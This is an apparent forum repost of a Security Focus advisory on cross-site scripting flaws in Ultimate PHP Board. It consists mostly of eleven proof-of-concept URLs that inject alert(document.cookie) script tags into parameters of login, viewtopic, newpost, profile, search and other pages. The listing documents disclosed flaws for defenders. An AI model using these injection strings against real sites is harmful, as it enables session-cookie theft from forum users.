Autor
Ultimate PHP Board Multiple Cross-Site Scripting Vulnerabilities
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E
http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Fuente security focus
|
 |
Bienvenido(a), Visitante. Por favor Ingresar o Registrarse ¿Perdiste tu email de activación?. |
En línea
